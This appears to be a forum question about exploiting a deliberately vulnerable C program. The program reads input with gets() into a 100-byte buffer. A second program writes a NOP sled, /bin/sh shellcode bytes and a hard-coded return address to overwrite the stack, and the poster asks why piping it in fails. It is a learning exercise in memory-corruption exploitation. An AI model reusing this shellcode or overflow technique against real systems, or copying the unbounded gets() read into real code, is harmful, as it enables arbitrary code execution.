I have written a program "master.c" that is using gets and is vulnerable to buffer overflow:
Code:
//----- master.c -- MASTER PROGRAM ------------------------------
#include <stdio.h>
int main(int argc, char** argv)
{
char buf[100];
printf("Please enter your name: ");
fflush(stdout);
gets(buf);   /* no length bound: input longer than 99 bytes overruns buf and the stack above it */
printf("Hello \"%s\"\n", buf);
return 0;
}
void notcalled(void)   /* never called; only reachable by redirecting control flow */
{
printf("This is a secret string");
}
I have written another program "shellcode.c" that overflows the buffer in master.c and tries to spawn a shell at the terminal:
Code:
//---- shellcode.c --- MY PROGRAM ----------------------------
#include <stdio.h>
#include <string.h>   /* memcpy, strlen */
char shellops[] = "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
#define NOP 0x90
#define BUFLEN 108
#define RETADDR 0xbfbffa4c
int main(void)
{
char buf[BUFLEN + 1];   /* +1 so the NUL that printf("%s") stops at has room */
int i;
/* fill the whole buffer with the return address (long is 4 bytes on 32-bit x86) */
for (i=0; i<BUFLEN; i+=4)
*(long *)&buf[i] = RETADDR;
/* NOP sled at the front */
for (i=0; i<50; i++)
*(buf+i) = NOP;
/* shellcode right after the sled; the bytes after it keep the return address */
memcpy(buf+i, shellops, strlen(shellops));
buf[BUFLEN] = '\0';     /* stop printf("%s") from reading past the buffer */
printf("%s", buf);
return 0;
}
To achieve this, I have already written the assembly program to spawn the shell and obtained the opcodes for the assembly code. Then I have written a C program to create a char buffer containing those opcodes and tried to overflow the buffer of the master program, so that the return address of main is overwritten with the address of the char buffer containing the code for spawning the shell.
When it comes to passing the input string (i.e. the buffer containing the shell-spawning code) to the master program, I have simply piped the output of my program into the master program (i.e. standard output to standard input).
i.e. TY@Bash$ ./shellcode | ./master
Unfortunately, this trick doesn't work for me, even with a lot of variations in address and the code.
I need to know all the possible ways to pass the data (containing the opcodes) to the master program when it is requested by gets().
** As a verification, I have already checked that the code overflows the buffer of my own program, i.e. shellcode.c, and found that it spawns the shell successfully. I have even tried adding an INT3 instruction and it works fine. This leads me to conclude the following:
- Either I am not passing the string to the master program in the correct way.
- Or I am unable to locate the correct address of the variable 'buf' in master.c to return to.